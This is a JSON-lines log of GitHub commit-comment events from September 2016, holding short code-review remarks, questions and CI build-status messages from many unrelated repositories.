{"id":"4629517394","type":"CommitCommentEvent","actor":{"login":"Salandora"},"repo":{"name":"foosel/OctoPrint"},"payload":{"comment":{"id":19204672,"position":null,"line":null,"path":null,"commit_id":"d9e3553c7c4e18646f1d360822eeb07ba6586e95","created_at":"2016-09-28T09:31:14Z","updated_at":"2016-09-28T09:31:14Z","body":"Ahh no problem at all.\r\nI'm fine with the rename.\r\nWill also update the fileManager plugin soon to get rid of the old names."}},"created_at":"2016-09-28T09:31:14Z"}
{"id":"4629518471","type":"CommitCommentEvent","actor":{"login":"nguyenvanphituoc"},"repo":{"name":"nguyenvanphituoc/introduce"},"payload":{"comment":{"id":19204677,"position":null,"line":null,"path":null,"commit_id":"3f72bc46c061fcfb061848395e6ac9fed8a09dcc","created_at":"2016-09-28T09:31:27Z","updated_at":"2016-09-28T09:31:27Z","body":"asd"}},"created_at":"2016-09-28T09:31:27Z"}
{"id":"4629523567","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":19204688,"position":6,"line":102,"path":"xwiki-platform-core/xwiki-platform-oldcore/src/main/java/com/xpn/xwiki/web/XWikiServletRequestStub.java","commit_id":"75490835df767d99ff40d3a5bd4eacf2cf137f76","created_at":"2016-09-28T09:32:31Z","updated_at":"2016-09-28T09:32:31Z","body":"nice catch, I was thinking about typos I could make... And I think the javadoc generation jobs will complain. I hope it's the case. Fixing."}},"created_at":"2016-09-28T09:32:31Z"}
{"id":"4629525519","type":"CommitCommentEvent","actor":{"login":"marvinroger"},"repo":{"name":"marvinroger/homie-esp8266"},"payload":{"comment":{"id":19204700,"position":40,"line":201,"path":"src/Homie/Boot/BootNormal.cpp","commit_id":"c46704a611896ef1586defc2df71a22f3696e1e5","created_at":"2016-09-28T09:32:54Z","updated_at":"2016-09-28T09:32:54Z","body":"Well, you're right! This is a bug."}},"created_at":"2016-09-28T09:32:54Z"}
{"id":"4629529331","type":"CommitCommentEvent","actor":{"login":"jnioche"},"repo":{"name":"sebastian-nagel/storm-crawler"},"payload":{"comment":{"id":19204707,"position":58,"line":58,"path":"external/elasticsearch/src/main/java/com/digitalpebble/stormcrawler/elasticsearch/persistence/AbstractElasticSearchSpout.java","commit_id":"654569d2b817f958d6fc1395c8e983d5ed7396df","created_at":"2016-09-28T09:33:40Z","updated_at":"2016-09-28T09:33:40Z","body":"yes, was thinking about that. unless we had a way of decoupling the beingProcessed count i.e. in the set from the (inPurgatory|keptCaptive|inPostProcessCache|whichEverNameIsBetter) count from the cache."}},"created_at":"2016-09-28T09:33:40Z"}
{"id":"4629530399","type":"CommitCommentEvent","actor":{"login":"vishal1shukla2"},"repo":{"name":"krishhub/Students"},"payload":{"comment":{"id":19204709,"position":13,"line":54,"path":"app/app.js","commit_id":"645dc17dd7f68cf49d48ac471840eca12be1c1a0","created_at":"2016-09-28T09:33:52Z","updated_at":"2016-09-28T09:33:52Z","body":"If you can explain the issue that you are facing related to formatting, me or Bhavesh can try to help you out with it."}},"created_at":"2016-09-28T09:33:52Z"}
{"id":"4629532768","type":"CommitCommentEvent","actor":{"login":"jcadduono"},"repo":{"name":"offensive-security/kali-nethunter"},"payload":{"comment":{"id":19204716,"position":null,"line":null,"path":null,"commit_id":"f64881e370a16f4004f73718a0d0462325736e44","created_at":"2016-09-28T09:34:21Z","updated_at":"2016-09-28T09:34:21Z","body":"also omg i need to find a way to properly unmount this stuff `umount -R kali-armhf` made me have to call my dedi host to reboot my server lols"}},"created_at":"2016-09-28T09:34:21Z"}
{"id":"4629543914","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19204731,"position":null,"line":null,"path":null,"commit_id":"96e1aa5a344300d3bf0018af0c6a5e63b70ab7db","created_at":"2016-09-28T09:36:37Z","updated_at":"2016-09-28T09:36:37Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1187](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14451&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 260, ignored: 3 Build time: 00:13:04"}},"created_at":"2016-09-28T09:36:37Z"}
{"id":"4629544582","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19204732,"position":null,"line":null,"path":null,"commit_id":"99480e53d2371c385c3e2eb1b37bca6f2e6ac7e7","created_at":"2016-09-28T09:36:45Z","updated_at":"2016-09-28T09:36:45Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 274](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1248&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:27:53"}},"created_at":"2016-09-28T09:36:45Z"}
{"id":"4629545091","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19204733,"position":null,"line":null,"path":null,"commit_id":"5453ce67102b02030bf74e050285798447c1a00a","created_at":"2016-09-28T09:36:50Z","updated_at":"2016-09-28T09:36:50Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 275](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1249&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-28T09:36:50Z"}
{"id":"4629546983","type":"CommitCommentEvent","actor":{"login":"sumit6b"},"repo":{"name":"anarchicknight/react-native-communications"},"payload":{"comment":{"id":19204736,"position":null,"line":null,"path":null,"commit_id":"180383d6788f4293ebd388f1727f71fb24004bf4","created_at":"2016-09-28T09:37:13Z","updated_at":"2016-09-28T09:37:13Z","body":"Arrow functions are breaking the context in functions, so we are getting unexpected argument object within functions."}},"created_at":"2016-09-28T09:37:13Z"}
{"id":"4629547503","type":"CommitCommentEvent","actor":{"login":"soffes"},"repo":{"name":"apple/swift-protobuf-runtime"},"payload":{"comment":{"id":19204740,"position":null,"line":null,"path":null,"commit_id":"6b1a0b0a270f31b93c3d4255d94f8d8f2f9e1ae0","created_at":"2016-09-28T09:37:19Z","updated_at":"2016-09-28T09:37:19Z","body":"This is a real bummer :( I think the cleanliness of just `Protobuf` was really nice.\r\n\r\nIn my Swift code, it seems silly to do `import SwiftProtobuf`. I'm already writing Swift, so I know it's swift :)"}},"created_at":"2016-09-28T09:37:19Z"}
{"id":"4629547938","type":"CommitCommentEvent","actor":{"login":"rnestler"},"repo":{"name":"coredump-ch/ferraris-enumerator"},"payload":{"comment":{"id":19204742,"position":1,"line":1,"path":"LICENSE","commit_id":"8451fa4a05d179272fddee6fd5e1e23fc474d083","created_at":"2016-09-28T09:37:23Z","updated_at":"2016-09-28T09:37:23Z","body":"Why did you remove the license?"}},"created_at":"2016-09-28T09:37:23Z"}
{"id":"4629554101","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19204757,"position":null,"line":null,"path":null,"commit_id":"7939db5e0df1fb4e50149b2188fc48b6276e013b","created_at":"2016-09-28T09:38:35Z","updated_at":"2016-09-28T09:38:35Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1188](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14452&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 260, ignored: 3 Build time: 00:14:46"}},"created_at":"2016-09-28T09:38:35Z"}
{"id":"4629559586","type":"CommitCommentEvent","actor":{"login":"artem-solovev"},"repo":{"name":"artem-solovev/artfolio"},"payload":{"comment":{"id":19204767,"position":null,"line":null,"path":null,"commit_id":"adee266562c58bc9fcd5c49524984ae20d6b7ad5","created_at":"2016-09-28T09:39:36Z","updated_at":"2016-09-28T09:39:36Z","body":"#2 Well done"}},"created_at":"2016-09-28T09:39:36Z"}
{"id":"4629561405","type":"CommitCommentEvent","actor":{"login":"manuel-uberti"},"repo":{"name":"manuel-uberti/.emacs.d"},"payload":{"comment":{"id":19204768,"position":null,"line":null,"path":null,"commit_id":"dc7679e2fb358a4184f76c1f06ade8a0682a6c7c","created_at":"2016-09-28T09:39:59Z","updated_at":"2016-09-28T09:39:59Z","body":"Oh yes, I copied and pasted your init-modeline.el in my setup for now. ;)"}},"created_at":"2016-09-28T09:39:59Z"}
{"id":"4629562323","type":"CommitCommentEvent","actor":{"login":"DNA-language"},"repo":{"name":"ccgd-profile/BreaKmer"},"payload":{"comment":{"id":19204772,"position":null,"line":null,"path":null,"commit_id":"3a3831563048b3aa16c04e86c8b6abe213136106","created_at":"2016-09-28T09:40:12Z","updated_at":"2016-09-28T09:40:12Z","body":"how to get the V0.0.6 version? I see you post this information this year ,but the master were unload last year,so how to get the latest version."}},"created_at":"2016-09-28T09:40:12Z"}
{"id":"4629567108","type":"CommitCommentEvent","actor":{"login":"rubensayshi"},"repo":{"name":"php-build/php-build"},"payload":{"comment":{"id":19204782,"position":null,"line":null,"path":null,"commit_id":"ee8b8b7173607c6e491425e39f106aecab339e37","created_at":"2016-09-28T09:41:11Z","updated_at":"2016-09-28T09:41:11Z","body":"awh :(\r\n\r\nI guess we'll be patiently waiting before we can use xdebug for 7.1 :-)"}},"created_at":"2016-09-28T09:41:11Z"}
{"id":"4629569708","type":"CommitCommentEvent","actor":{"login":"hzsweers"},"repo":{"name":"nickbutcher/plaid"},"payload":{"comment":{"id":19204790,"position":118,"line":283,"path":"app/src/main/java/io/plaidapp/ui/widget/BottomSheet.java","commit_id":"69fefeb683d0bc08aba45d7edea71c8927fb476c","created_at":"2016-09-28T09:41:40Z","updated_at":"2016-09-28T09:41:40Z","body":"I'm fine either way, my IDE underlines it in red though :)"}},"created_at":"2016-09-28T09:41:40Z"}
{"id":"4629570013","type":"CommitCommentEvent","actor":{"login":"lovep10"},"repo":{"name":"nelenkov/verity"},"payload":{"comment":{"id":19204791,"position":null,"line":null,"path":null,"commit_id":"9ec36432f3251377d4b6094961a5b3460a22ed7b","created_at":"2016-09-28T09:41:44Z","updated_at":"2016-09-28T09:41:44Z","body":"https://github.com/nelenkov/verity.git"}},"created_at":"2016-09-28T09:41:44Z"}
{"id":"4629572392","type":"CommitCommentEvent","actor":{"login":"dreammed"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19204796,"position":null,"line":null,"path":null,"commit_id":"f513adb0dc7f86f2e5265a7cdc174af51191d330","created_at":"2016-09-28T09:42:12Z","updated_at":"2016-09-28T09:42:12Z","body":"bot  = stupid guy \r\nthink like stupid guy\r\nstupid guy want to fusion \r\n1.where i am \r\n2.i want to fusion\r\n3.where i am\r\n4.how to fusion\r\n5.go to hero manage\r\n6.find the way to go to mange\r\n7,found manage hero \r\n8.find hero to fusion \r\n9.i want to fusion this hero with condition\r\n10 find hero to fusion with\r\n11.how find\r\n12.lv30 and star\r\n13.find lv30 and star\r\n14.select fusion hero to fusion \r\n15.fusion \r\n16.is max upgrade  or not go to 10.\r\n18 max upgrade \r\n19 end fusion and find next upgrade go to 8.\r\n\r\nit more stupid thing  not just this"}},"created_at":"2016-09-28T09:42:12Z"}
{"id":"4629573467","type":"CommitCommentEvent","actor":{"login":"Mara-AspIT"},"repo":{"name":"mofl-aspit/PersonPolymorph.Exercise"},"payload":{"comment":{"id":19204801,"position":6,"line":6,"path":"UserLayer/Person.cs","commit_id":"63453cffe7849e39346043e71e5f59a2d5da9f14","created_at":"2016-09-28T09:42:25Z","updated_at":"2016-09-28T09:42:25Z","body":"Overvej at putte dine usings ind i namespace. Og du kun bør have de usings med som rent faktisk bliver brugt."}},"created_at":"2016-09-28T09:42:25Z"}
{"id":"4629574598","type":"CommitCommentEvent","actor":{"login":"hanifnezhad"},"repo":{"name":"hanifnezhad/test"},"payload":{"comment":{"id":19204803,"position":null,"line":null,"path":null,"commit_id":"af36dbec86abeca2e93456ad0e3cc848115019ef","created_at":"2016-09-28T09:42:39Z","updated_at":"2016-09-28T09:42:39Z","body":"jh"}},"created_at":"2016-09-28T09:42:39Z"}
{"id":"4629582125","type":"CommitCommentEvent","actor":{"login":"henrypp"},"repo":{"name":"henrypp/wfptool"},"payload":{"comment":{"id":19204818,"position":null,"line":null,"path":null,"commit_id":"206273ce32e2d0fd528b7e7aa6d5a154d30154dd","created_at":"2016-09-28T09:44:09Z","updated_at":"2016-09-28T09:44:09Z","body":"@jasonliul\r\ni do nothing, because i'm not author of locale"}},"created_at":"2016-09-28T09:44:09Z"}
{"id":"4629584405","type":"CommitCommentEvent","actor":{"login":"mathiasrw"},"repo":{"name":"parallel-js/parallel.js"},"payload":{"comment":{"id":19204824,"position":5,"line":5,"path":"test/specs/performance.spec.js","commit_id":"018243e140063e01960c573801f97a5d8571e180","created_at":"2016-09-28T09:44:37Z","updated_at":"2016-09-28T09:44:37Z","body":"Todo"}},"created_at":"2016-09-28T09:44:37Z"}
{"id":"4629588886","type":"CommitCommentEvent","actor":{"login":"Mara-AspIT"},"repo":{"name":"mofl-aspit/PersonPolymorph.Exercise"},"payload":{"comment":{"id":19204835,"position":5,"line":16,"path":"UserLayer/Person.cs","commit_id":"5485c84fd07b3f92ed42b1affe9cb28d85471d0f","created_at":"2016-09-28T09:45:26Z","updated_at":"2016-09-28T09:45:26Z","body":"Fed kommentar."}},"created_at":"2016-09-28T09:45:26Z"}
{"id":"4629593173","type":"CommitCommentEvent","actor":{"login":"ingbrzy"},"repo":{"name":"ingbrzy/MA-XML-8.0-TURKISH"},"payload":{"comment":{"id":19204845,"position":null,"line":null,"path":null,"commit_id":"9d2da976c89842f014211ae64b792c7dc88f9614","created_at":"2016-09-28T09:46:18Z","updated_at":"2016-09-28T09:46:18Z","body":"you just waste your time by translating these useless apks.."}},"created_at":"2016-09-28T09:46:18Z"}
{"id":"4629593897","type":"CommitCommentEvent","actor":{"login":"jmencak"},"repo":{"name":"openshift/svt"},"payload":{"comment":{"id":19204847,"position":null,"line":null,"path":null,"commit_id":"4cc6aabf2607703e962d16319caca5edfe7f0e06","created_at":"2016-09-28T09:46:26Z","updated_at":"2016-09-28T09:46:26Z","body":"Doesn't work for me, I'm afraid.  Added some debugging to the code on line 425 and it shows: \"len(pods_running)=3, num_expected=2\" when ready, but the loop is still blocking.  Template I'm using is here: http://pastebin.test.redhat.com/416170\r\n\r\nStill the same issue, if I swap the slstress/logger sections in the yaml above, I'll get \"len(pods_running)=3, num_expected=1\", so the code doesn't sum up the number of pods created by the templates.  We want to see num_expected=3 in this case."}},"created_at":"2016-09-28T09:46:26Z"}
{"id":"4629594129","type":"CommitCommentEvent","actor":{"login":"mathiasrw"},"repo":{"name":"parallel-js/parallel.js"},"payload":{"comment":{"id":19204849,"position":4,"line":13,"path":"package.json","commit_id":"018243e140063e01960c573801f97a5d8571e180","created_at":"2016-09-28T09:46:29Z","updated_at":"2016-09-28T09:46:29Z","body":"ToDo"}},"created_at":"2016-09-28T09:46:29Z"}
{"id":"4629598521","type":"CommitCommentEvent","actor":{"login":"Mara-AspIT"},"repo":{"name":"Mara-AspIT/Utils"},"payload":{"comment":{"id":19204857,"position":5,"line":5,"path":"Mara.Utils.Networking/Serializer.cs","commit_id":"720d8789d0150fca561edd458b98e23483b12c40","created_at":"2016-09-28T09:47:21Z","updated_at":"2016-09-28T09:47:21Z","body":"Hvad bruger du den using til?"}},"created_at":"2016-09-28T09:47:21Z"}
{"id":"4629603198","type":"CommitCommentEvent","actor":{"login":"aofall"},"repo":{"name":"lfnot/hosts"},"payload":{"comment":{"id":19204870,"position":null,"line":null,"path":null,"commit_id":"c64baf84d7e4289ddb35094c229b5053f38ede43","created_at":"2016-09-28T09:48:16Z","updated_at":"2016-09-28T09:48:16Z","body":"这个IP不适用与这个域名"}},"created_at":"2016-09-28T09:48:16Z"}
{"id":"4629605086","type":"CommitCommentEvent","actor":{"login":"Dan1003"},"repo":{"name":"IivoMitrunen/MyFirstProject"},"payload":{"comment":{"id":19204875,"position":null,"line":null,"path":null,"commit_id":"29a0804087b99d1f276aed0f5bab6eb86b12dd37","created_at":"2016-09-28T09:48:39Z","updated_at":"2016-09-28T09:48:39Z","body":"I'm leaving a comment"}},"created_at":"2016-09-28T09:48:39Z"}
{"id":"4629605385","type":"CommitCommentEvent","actor":{"login":"Makcoh4nk"},"repo":{"name":"Makcoh4nk/Test"},"payload":{"comment":{"id":19204877,"position":null,"line":null,"path":null,"commit_id":"dbfa7046753fc3c1353f521396c6ecf707d5516e","created_at":"2016-09-28T09:48:42Z","updated_at":"2016-09-28T09:48:42Z","body":"@VlaKuz 123"}},"created_at":"2016-09-28T09:48:42Z"}
{"id":"4629606276","type":"CommitCommentEvent","actor":{"login":"jamesbascle"},"repo":{"name":"Jagged/OneOf"},"payload":{"comment":{"id":19204878,"position":null,"line":null,"path":null,"commit_id":"b5c4981bdd732dd7bfe336a25f1b0db0688f4795","created_at":"2016-09-28T09:48:53Z","updated_at":"2016-09-28T09:48:53Z","body":"👍 I think its a good choice to remove the various exceptions on null results and such...this isn't F# after all"}},"created_at":"2016-09-28T09:48:53Z"}
{"id":"4629607118","type":"CommitCommentEvent","actor":{"login":"lewis-fidlers"},"repo":{"name":"10to1/dropbox-sdk-ruby"},"payload":{"comment":{"id":19204880,"position":4,"line":9,"path":"lib/dropbox-sdk-ruby_v2.rb","commit_id":"81b277eeb240ecf9b8fc6f5f9bcdc8f41f1f7a00","created_at":"2016-09-28T09:49:02Z","updated_at":"2016-09-28T09:49:02Z","body":"Pry is not loaded on production. Makes the deploy crash @LDonnez "}},"created_at":"2016-09-28T09:49:02Z"}
{"id":"4629609735","type":"CommitCommentEvent","actor":{"login":"arrsin"},"repo":{"name":"arrsin/taobao.project"},"payload":{"comment":{"id":19204888,"position":108,"line":226,"path":"live_number.go","commit_id":"9cbe2e7cbc8dc17b1ed203c2f628f56cdbbb03f3","created_at":"2016-09-28T09:49:32Z","updated_at":"2016-09-28T09:49:32Z","body":"linux系统下无法用此执行shell"}},"created_at":"2016-09-28T09:49:32Z"}
{"id":"4629610392","type":"CommitCommentEvent","actor":{"login":"Guozhongzhi"},"repo":{"name":"Guozhongzhi/Homework-materials"},"payload":{"comment":{"id":19204893,"position":null,"line":null,"path":null,"commit_id":"95694e1a3305ac5130cb6a112a0f497d7cfd35dc","created_at":"2016-09-28T09:49:40Z","updated_at":"2016-09-28T09:49:40Z","body":"热统第一章运行结果\r\n![defaul4](https://cloud.githubusercontent.com/assets/22026568/18907374/036e4948-859e-11e6-8351-fd8d4d9b9be1.jpg)\r\n![default](https://cloud.githubusercontent.com/assets/22026568/18907375/03ab0a40-859e-11e6-810b-9c3b145d0cff.jpg)\r\n![default1](https://cloud.githubusercontent.com/assets/22026568/18907376/03af5a0a-859e-11e6-96df-85cb6815279f.jpg)\r\n![default2](https://cloud.githubusercontent.com/assets/22026568/18907377/03dfefc6-859e-11e6-88b7-79578bab6c27.jpg)\r\n![default3](https://cloud.githubusercontent.com/assets/22026568/18907379/03e3bc50-859e-11e6-8793-00eaa8f93ef6.jpg)\r\n![default5](https://cloud.githubusercontent.com/assets/22026568/18907378/03e11fa4-859e-11e6-9d29-fc90f3416cc1.jpg)\r\n![default6](https://cloud.githubusercontent.com/assets/22026568/18907380/03edd820-859e-11e6-886d-045781860f8a.jpg)\r\n"}},"created_at":"2016-09-28T09:49:40Z"}
{"id":"4629618851","type":"CommitCommentEvent","actor":{"login":"array88"},"repo":{"name":"Mogara/QSanguosha-For-Hegemony"},"payload":{"comment":{"id":19204909,"position":null,"line":null,"path":null,"commit_id":"69f168f5c1e4cfed3664771f78d78a725f0363b3","created_at":"2016-09-28T09:51:20Z","updated_at":"2016-09-28T09:51:20Z","body":"（与此commit无关）\r\n【Bug】马谡放AOE时，对装备区判定区没有牌且非蜀的角色制蛮，会导致AOE跳过对下一名目标的结算。\r\n在lua这边试了半天，唯一的解决方式是将ZhimanSecond在effect中返回的true改成false。\r\n原因不明，把源码快翻遍了也没找出个所以然来"}},"created_at":"2016-09-28T09:51:20Z"}
{"id":"4629623067","type":"CommitCommentEvent","actor":{"login":"Fahrenhei7"},"repo":{"name":"Fahrenhei7/storyline"},"payload":{"comment":{"id":19204924,"position":null,"line":null,"path":null,"commit_id":"032fff22d80587e7f882403ac58ae54dda19b405","created_at":"2016-09-28T09:52:10Z","updated_at":"2016-09-28T09:52:10Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add simple views to Story CRUD](https://trello.com/c/TboIgDT8/4-add-simple-views-to-story-crud)"}},"created_at":"2016-09-28T09:52:10Z"}
{"id":"4629627321","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19204938,"position":2,"line":2,"path":"basket.html","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T09:52:57Z","updated_at":"2016-09-28T09:52:57Z","body":"почему `en`?)"}},"created_at":"2016-09-28T09:52:57Z"}
{"id":"4629632810","type":"CommitCommentEvent","actor":{"login":"Guozhongzhi"},"repo":{"name":"Guozhongzhi/Homework-materials"},"payload":{"comment":{"id":19204946,"position":null,"line":null,"path":null,"commit_id":"95694e1a3305ac5130cb6a112a0f497d7cfd35dc","created_at":"2016-09-28T09:53:59Z","updated_at":"2016-09-28T09:53:59Z","body":"[热统第一章](https://www.zybuluo.com/Guozhongzhi/note/516681)"}},"created_at":"2016-09-28T09:53:59Z"}
{"id":"4629637436","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19204957,"position":13,"line":13,"path":"basket.html","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T09:54:47Z","updated_at":"2016-09-28T09:54:47Z","body":"`active` — это модификатор элемента?"}},"created_at":"2016-09-28T09:54:47Z"}
{"id":"4629640837","type":"CommitCommentEvent","actor":{"login":"milliams"},"repo":{"name":"ganga-devs/ganga"},"payload":{"comment":{"id":19204967,"position":4,"line":207,"path":"python/Ganga/GPIDev/Adapters/IGangaFile.py","commit_id":"906feb0c7b8910feb511cb412d437ec9bdfcfdcb","created_at":"2016-09-28T09:55:27Z","updated_at":"2016-09-28T09:55:27Z","body":"If removing `staticmethod`, must also add `self` to argument list."}},"created_at":"2016-09-28T09:55:27Z"}
{"id":"4629646651","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"Minimata/WebGl"},"payload":{"comment":{"id":19204977,"position":73,"line":81,"path":"planet/js/scene.js","commit_id":"e07072c4298da68209d785ca8b83618293062f85","created_at":"2016-09-28T09:56:35Z","updated_at":"2016-09-28T09:56:35Z","body":"my bad... `console.error()`"}},"created_at":"2016-09-28T09:56:35Z"}
{"id":"4629648744","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19204980,"position":25,"line":25,"path":"basket.html","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T09:57:00Z","updated_at":"2016-09-28T09:57:00Z","body":"форма в ссылке?) как форму сабмитим без js?"}},"created_at":"2016-09-28T09:57:00Z"}
{"id":"4629650896","type":"CommitCommentEvent","actor":{"login":"the-Arioch"},"repo":{"name":"dheijl/Delphi-XmlLite"},"payload":{"comment":{"id":19204982,"position":null,"line":null,"path":null,"commit_id":"00ebc43d5f27ccf643b9f09a1220997216ac27a2","created_at":"2016-09-28T09:57:26Z","updated_at":"2016-09-28T09:57:26Z","body":"enums: u forgot about \"WriteStartDocument(XmlStandalone_Omit)\"  :-)"}},"created_at":"2016-09-28T09:57:26Z"}
{"id":"4629653805","type":"CommitCommentEvent","actor":{"login":"jakubbachniak"},"repo":{"name":"jakubbachniak/Java_Heater_exercise"},"payload":{"comment":{"id":19204988,"position":null,"line":null,"path":null,"commit_id":"b49c3ffb302ae0da276912deb9e3308f6e77e0f1","created_at":"2016-09-28T09:58:01Z","updated_at":"2016-09-28T09:58:01Z","body":"Not crazy about the change.\r\nAt least I'm getting a step forward with git."}},"created_at":"2016-09-28T09:58:01Z"}
{"id":"4629655494","type":"CommitCommentEvent","actor":{"login":"GabrielTK"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":19204989,"position":null,"line":null,"path":null,"commit_id":"43da54f8dcdd4776d6dcd65916f6c63a1a1a80fd","created_at":"2016-09-28T09:58:21Z","updated_at":"2016-09-28T09:58:21Z","body":"Sorry, but isn't the run-linux.sh missing too???"}},"created_at":"2016-09-28T09:58:21Z"}
{"id":"4629660326","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19205002,"position":30,"line":30,"path":"basket.html","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T09:59:21Z","updated_at":"2016-09-28T09:59:21Z","body":"...можно же псевдоэлементами?"}},"created_at":"2016-09-28T09:59:21Z"}
{"id":"4629662436","type":"CommitCommentEvent","actor":{"login":"Cronick"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":19205008,"position":null,"line":null,"path":null,"commit_id":"43da54f8dcdd4776d6dcd65916f6c63a1a1a80fd","created_at":"2016-09-28T09:59:46Z","updated_at":"2016-09-28T09:59:46Z","body":"run-linux.sh has not been a part of the repository for a few updates.\r\nThose files got uploaded into the repository by mistake."}},"created_at":"2016-09-28T09:59:46Z"}
{"id":"4634209906","type":"CommitCommentEvent","actor":{"login":"ifdog"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19216705,"position":null,"line":null,"path":null,"commit_id":"e710914af611aa42ba5454c22a71ff8b7bfdda02","created_at":"2016-09-29T00:00:55Z","updated_at":"2016-09-29T00:00:55Z","body":"WPF在你那里卡不卡？运动时闪烁不闪烁？"}},"created_at":"2016-09-29T00:00:55Z"}
{"id":"4634210977","type":"CommitCommentEvent","actor":{"login":"jorndorff"},"repo":{"name":"Pingry-Java/StairCases-wzhang2018"},"payload":{"comment":{"id":19216708,"position":33,"line":33,"path":"stairs.java","commit_id":"57963ba8903e643645e4088e89a6b7c5f2c72495","created_at":"2016-09-29T00:01:12Z","updated_at":"2016-09-29T00:01:12Z","body":"That's nice use of syntax to increment and compare in the same condition!"}},"created_at":"2016-09-29T00:01:12Z"}
{"id":"4634214366","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/rogue-test"},"payload":{"comment":{"id":19216712,"position":null,"line":null,"path":null,"commit_id":"93f7b596168ad53996f543df4841547802684af6","created_at":"2016-09-29T00:02:08Z","updated_at":"2016-09-29T00:02:08Z","body":"The new collisions are still a bit buggy, but I'm working on it"}},"created_at":"2016-09-29T00:02:08Z"}
{"id":"4634217674","type":"CommitCommentEvent","actor":{"login":"cryptocc"},"repo":{"name":"ethcore/parity"},"payload":{"comment":{"id":19216715,"position":null,"line":null,"path":null,"commit_id":"15a14a5f497b9b4aff7f97825d9f6e75c5bf46b3","created_at":"2016-09-29T00:03:00Z","updated_at":"2016-09-29T00:03:00Z","body":"What an awesome dev!"}},"created_at":"2016-09-29T00:03:00Z"}
{"id":"4634219785","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19216722,"position":null,"line":null,"path":null,"commit_id":"fb588cc683107fbb0e9dfc0acab1149122486c8c","created_at":"2016-09-29T00:03:34Z","updated_at":"2016-09-29T00:03:34Z","body":"iteration (evanweaver) - x86_64-MacOS-10.10-clang: OK (2376 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fb588cc683107fbb0e9dfc0acab1149122486c8c-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fb588cc683107fbb0e9dfc0acab1149122486c8c-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.06%25-yellow.svg)</a> \n"}},"created_at":"2016-09-29T00:03:34Z"}
{"id":"4634222458","type":"CommitCommentEvent","actor":{"login":"MathBunny"},"repo":{"name":"jerryliu3/711-Problem"},"payload":{"comment":{"id":19216730,"position":null,"line":null,"path":null,"commit_id":"a60aa1f49d3e9ebc1f4400fc86c2936ad12b5dd3","created_at":"2016-09-29T00:04:18Z","updated_at":"2016-09-29T00:04:18Z","body":"Consider using private repositories for school projects, not sure how the academic integrity thing plays with assignments. You can qualify for a paid GitHub account for free through UWaterloo"}},"created_at":"2016-09-29T00:04:18Z"}
{"id":"4634223048","type":"CommitCommentEvent","actor":{"login":"Acarii"},"repo":{"name":"iblobtouch/iblobtouch.github.io"},"payload":{"comment":{"id":19216732,"position":null,"line":null,"path":null,"commit_id":"98f323a14869f2cbba61cd315afaf4841f9c4657","created_at":"2016-09-29T00:04:28Z","updated_at":"2016-09-29T00:04:28Z","body":"Ooops. Editied wrong line. This is why I should stick to editing my own repo. I *Would* revert at this point, but I think I'll just fix it manually since I can't seem to find any clear reversion function on github. "}},"created_at":"2016-09-29T00:04:28Z"}
